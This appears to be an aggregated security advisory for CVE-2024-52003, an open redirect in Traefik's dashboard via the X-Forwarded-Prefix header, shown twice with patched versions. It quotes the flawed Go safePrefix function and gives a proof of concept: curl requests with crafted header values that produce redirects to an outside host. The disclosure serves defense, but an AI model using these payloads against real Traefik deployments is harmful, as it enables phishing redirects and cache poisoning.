Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-h924-8g65-j9wg: Traefik's X-Forwarded-Prefix Header still allows for Open Redirect

Impact

There is a vulnerability in Traefik that allows the client to provide the X-Forwarded-Prefix header from an untrusted source.

Patches

  • https://github.com/traefik/traefik/releases/tag/v2.11.14
  • https://github.com/traefik/traefik/releases/tag/v3.2.1

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

<details> <summary>Original Description</summary>

Summary

The previously reported open redirect (GHSA-6qq8-5wq3-86rp) is not fixed correctly. The safePrefix function can be tricked to return an absolute URL.

Details

The Traefik API dashboard component tries to validate that the value of the header X-Forwarded-Prefix is a site relative path:

http.Redirect(resp, req, safePrefix(req)+"/dashboard/", http.StatusFound)

func safePrefix(req *http.Request) string {
    prefix := req.Header.Get("X-Forwarded-Prefix")
    if prefix == "" {
        return ""
    }

    parse, err := url.Parse(prefix)
    if err != nil {
        return ""
    }

    return parse.Path
}

PoC

An attacker can bypass this by sending the following payload:

curl -v 'http://traefik.localhost' -H 'X-Forwarded-Prefix: %0d//a.com'
[...]
> HTTP/1.1 302 Found
> Location: //a.com/dashboard/

or similar:

curl -v 'http://traefik.localhost' -H 'X-Forwarded-Prefix: %2f%2fa.com'
[...]
> HTTP/1.1 302 Found
> Location: //a.com/dashboard/

Impact

Similar to the previously reported bug. In cache poisoning scenarios this may be exploitable. </details>

ghsa
Open in Source
#vulnerability#ios#git
  1. GitHub Advisory Database
  2. GitHub Reviewed
  3. CVE-2024-52003

Traefik’s X-Forwarded-Prefix Header still allows for Open Redirect

Moderate severity GitHub Reviewed Published Nov 29, 2024 in traefik/traefik

Package

gomod github.com/traefik/traefik/v2 (Go)

Affected versions

< 2.11.14

gomod github.com/traefik/traefik/v3 (Go)

Impact

There is a vulnerability in Traefik that allows the client to provide the X-Forwarded-Prefix header from an untrusted source.

Patches

  • https://github.com/traefik/traefik/releases/tag/v2.11.14
  • https://github.com/traefik/traefik/releases/tag/v3.2.1

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

Original Description ### Summary The previously reported open redirect ([GHSA-6qq8-5wq3-86rp](https://github.com/traefik/traefik/security/advisories/GHSA-6qq8-5wq3-86rp)) is not fixed correctly. The safePrefix function can be tricked to return an absolute URL.Details

The Traefik API dashboard component tries to validate that the value of the header X-Forwarded-Prefix is a site relative path:

http.Redirect(resp, req, safePrefix(req)+"/dashboard/", http.StatusFound)

func safePrefix(req *http.Request) string { prefix := req.Header.Get(“X-Forwarded-Prefix”) if prefix == “” { return “” }

parse, err := url.Parse(prefix)
if err != nil {
    return ""
}

return parse.Path

}

PoC

An attacker can bypass this by sending the following payload:

curl -v ‘http://traefik.localhost’ -H ‘X-Forwarded-Prefix: %0d//a.com’ […] > HTTP/1.1 302 Found > Location: //a.com/dashboard/

or similar:

curl -v ‘http://traefik.localhost’ -H ‘X-Forwarded-Prefix: %2f%2fa.com’ […] > HTTP/1.1 302 Found > Location: //a.com/dashboard/

Impact

Similar to the previously reported bug. In cache poisoning scenarios this may be exploitable.

### References - https://github.com/traefik/traefik/security/advisories/GHSA-h924-8g65-j9wg - https://nvd.nist.gov/vuln/detail/CVE-2024-52003 - https://github.com/traefik/traefik/pull/11253 - https://github.com/traefik/traefik/releases/tag/v2.11.14 - https://github.com/traefik/traefik/releases/tag/v3.2.1

Published to the GitHub Advisory Database

Dec 2, 2024

ghsa: Latest News

GHSA-66q9-2rvx-qfj5: Kolide Agent Privilege Escalation (Windows, Versions >= 1.5.3, < 1.12.3)
ghsa